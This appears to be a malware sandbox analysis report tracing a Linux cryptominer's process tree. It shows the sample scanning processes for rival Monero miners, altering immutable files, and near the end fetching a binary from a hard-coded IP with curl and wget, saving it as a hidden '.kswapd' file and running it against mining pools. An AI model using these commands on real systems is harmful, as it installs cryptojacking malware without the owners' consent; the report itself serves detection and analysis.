/bin/readlinkreadlink /proc/532/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/532/exe2⤵
-
/bin/readlinkreadlink /proc/533/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/533/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/575/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/575/exe2⤵
-
/bin/readlinkreadlink /proc/577/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/577/exe2⤵
-
/bin/readlinkreadlink /proc/599/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/599/exe2⤵
- Attempts to change immutable files
- Reads runtime system information
-
/bin/readlinkreadlink /proc/620/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/620/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/621/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/621/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/665/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/665/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/674/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/674/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/681/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/681/exe2⤵
-
/bin/readlinkreadlink /proc/683/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/683/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/692/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/692/exe2⤵
- Reads runtime system information
-
/bin/readlinkreadlink /proc/696/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/696/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/720/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/720/exe2⤵
-
/bin/readlinkreadlink /proc/747/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/747/exe2⤵
-
/bin/readlinkreadlink /proc/758/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/758/exe2⤵
-
/bin/readlinkreadlink /proc/930/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/930/exe2⤵
-
/bin/readlinkreadlink /proc/957/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/957/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/961/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/961/exe2⤵
-
/bin/readlinkreadlink /proc/966/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/966/exe2⤵
-
/bin/readlinkreadlink /proc/969/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/969/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/973/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/973/exe2⤵
-
/bin/readlinkreadlink /proc/1023/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1023/exe2⤵
-
/bin/readlinkreadlink /proc/1033/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1033/exe2⤵
-
/bin/readlinkreadlink /proc/1047/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1047/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1053/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1053/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1066/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1066/exe2⤵
-
/bin/readlinkreadlink /proc/1070/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1070/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1074/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1074/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1077/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1077/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1080/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1080/exe2⤵
-
/bin/readlinkreadlink /proc/1090/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1090/exe2⤵
-
/bin/readlinkreadlink /proc/1094/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1094/exe2⤵
-
/bin/readlinkreadlink /proc/1103/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1103/exe2⤵
-
/bin/readlinkreadlink /proc/1113/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1113/exe2⤵
-
/bin/readlinkreadlink /proc/1124/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1124/exe2⤵
-
/bin/readlinkreadlink /proc/1128/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1128/exe2⤵
-
/bin/readlinkreadlink /proc/1132/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1132/exe2⤵
-
/bin/readlinkreadlink /proc/1136/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1136/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1140/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1140/exe2⤵
-
/bin/readlinkreadlink /proc/1144/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1144/exe2⤵
-
/bin/readlinkreadlink /proc/1149/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1149/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1153/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1153/exe2⤵
-
/bin/readlinkreadlink /proc/1155/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1155/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1157/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1157/exe2⤵
-
/bin/readlinkreadlink /proc/1158/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1158/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1163/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1163/exe2⤵
-
/bin/readlinkreadlink /proc/1173/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1173/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1174/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1174/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1176/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1176/exe2⤵
-
/bin/readlinkreadlink /proc/1177/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1177/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1182/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1182/exe2⤵
-
/bin/readlinkreadlink /proc/1192/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1192/exe2⤵
-
/bin/readlinkreadlink /proc/1193/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1193/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1194/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1194/exe2⤵
-
/bin/readlinkreadlink /proc/1195/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1195/exe2⤵
-
/bin/readlinkreadlink /proc/1196/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1196/exe2⤵
-
/bin/readlinkreadlink /proc/1199/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1199/exe2⤵
-
/bin/readlinkreadlink /proc/1203/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1203/exe2⤵
-
/bin/readlinkreadlink /proc/1236/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1236/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1239/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1239/exe2⤵
-
/bin/readlinkreadlink /proc/1260/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1260/exe2⤵
-
/bin/readlinkreadlink /proc/1267/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1267/exe2⤵
-
/bin/readlinkreadlink /proc/1280/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1280/exe2⤵
-
/bin/readlinkreadlink /proc/1292/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1292/exe2⤵
-
/bin/readlinkreadlink /proc/1300/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1300/exe2⤵
-
/bin/readlinkreadlink /proc/1312/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1312/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1317/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1317/exe2⤵
-
/bin/readlinkreadlink /proc/1322/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1322/exe2⤵
-
/bin/readlinkreadlink /proc/1350/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1350/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1358/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1358/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1390/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1390/exe2⤵
-
/bin/readlinkreadlink /proc/1485/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1485/exe2⤵
-
/bin/readlinkreadlink /proc/1512/cwd2⤵
-
/bin/catcat /proc/1512/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kdumpy2⤵
-
/bin/readlinkreadlink /proc/1513/cwd2⤵
-
/bin/catcat /proc/1513/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump2⤵
-
/bin/readlinkreadlink /proc/1514/cwd2⤵
-
/bin/catcat /proc/1514/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma2⤵
-
/bin/readlinkreadlink /proc/1558/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1558/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1996/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1996/exe2⤵
-
/usr/bin/cutcut -c 1-322⤵
-
/usr/bin/md5summd5sum /.cache/.kswapd2⤵
-
/usr/bin/cutcut -c 1-322⤵
-
/usr/bin/md5summd5sum /.cache/.kswapd2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/grepgrep x86_642⤵
-
/usr/bin/curlcurl http://138.197.206.223/.x/xmra64 -o /.cache/.kswapd2⤵
-
/usr/bin/wgetwget http://138.197.206.223/.x/xmra64 -O /.cache/.kswapd2⤵
-
/bin/chmodchmod +x /.cache/.kswapd2⤵
-
/.cache/.kswapd/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B1⤵
- Executes dropped EXE
-
/.cache/.kswapd/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
/tmp/.gCM8WmmCs9RAsj7uFilesize
17B
MD5c5324e9e32e96381871c0f43647c480d
SHA1125de9ed319b53bc415d6b1a934ce2faf957110d
SHA25614aec313084082fc1778a36d44131c2f4c8fcc121fd4bbfcf18097d928c6006f
SHA5123f23db8c6220cf68f92fec98b69de286706c3d2570077c92c11bd020163a7e8895e20147788fbc4ee8a97316b543c4959db622214bdf34f77d3eced74c4b0b2a